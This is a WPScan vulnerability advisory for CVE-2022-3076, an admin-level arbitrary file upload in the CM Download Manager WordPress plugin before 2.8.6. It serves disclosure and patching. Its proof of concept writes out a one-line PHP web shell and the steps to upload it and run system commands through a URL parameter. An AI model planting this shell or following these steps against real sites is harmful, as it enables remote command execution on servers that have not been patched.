WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact
WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

CM Download Manager < 2.8.6 - Admin+ Arbitrary File Upload

Description

The plugin allows high privilege users such as admin to upload arbitrary files by setting the any extension via the plugin's setting, which could be used by admins of multisite blog to upload PHP files for example.

Proof of Concept

##########################
Activate PHP extension:
##########################

- Log in and go to "CM Downloads" > "Settings" > "General".

- Now you can simply add php extension to "Allowed file extensions:" field because the plugin does not check for php extension.

##################################
Upload our malicious PHP file:
##################################

- Go to "CM Downloads" > "Add New".

- Upload our malicious file :

	For example : malicious_php.php 
	<?=`$_GET[cmd]`?>

##########################
Find the right path:
##########################

We have two methods here because the code looks like:

   $name = time() . '_' . sanitize_file_name($_download_file['name']);

But we don't need to write a script, we can exploit this more easily:

- Go to "CM Downloads" > "CM Downloads".
- Click on "Edit" on the name we gave to our Download and now we are redirect on a page.
- We need to get the id present in the url for the following : http://target/cmdownload/edit/id/7/ => so here it's 7
- We can find the name of our malicious file below the "Browse" button : 1660921772_malicious_php.php
- So now we can execute system command:

 => target/wp-content/uploads/cmdm/id/filename

 https://target/wp-content/uploads/cmdm/7/1660921772_malicious_php.php?cmd=command 

Affects Plugins

cm-download-manager
Fixed in version 2.8.6

References

CVE
CVE-2022-3076

Classification

Type

UPLOAD

CWE
CWE-434

Miscellaneous

Original Researcher

Mika

Submitter

Mika

Submitter website
https://mikadmin.fr/
Submitter twitter
mika_sec
Verified

Yes

WPVDB ID
d18e695b-4d6e-4ff6-a060-312594a0d2bd

Timeline

Publicly Published

2022-09-05 (about 6 months ago)

Added

2022-09-05 (about 6 months ago)

Last Updated

2022-09-05 (about 6 months ago)

Our Other Services

WPScan WordPress Security Plugin
WPScan

Vulnerabilities

WordPressPluginsThemesOur StatsSubmit vulnerabilities

About

How it worksPricingWordPress pluginNewsContact

For Developers

StatusAPI detailsCLI scanner

Other

PrivacyTerms of serviceSubmission termsDisclosure policyPrivacy Notice for California Users
jetpackIn partnership with Jetpack
githubtwitterfacebook
Angithubendeavor
Work With Us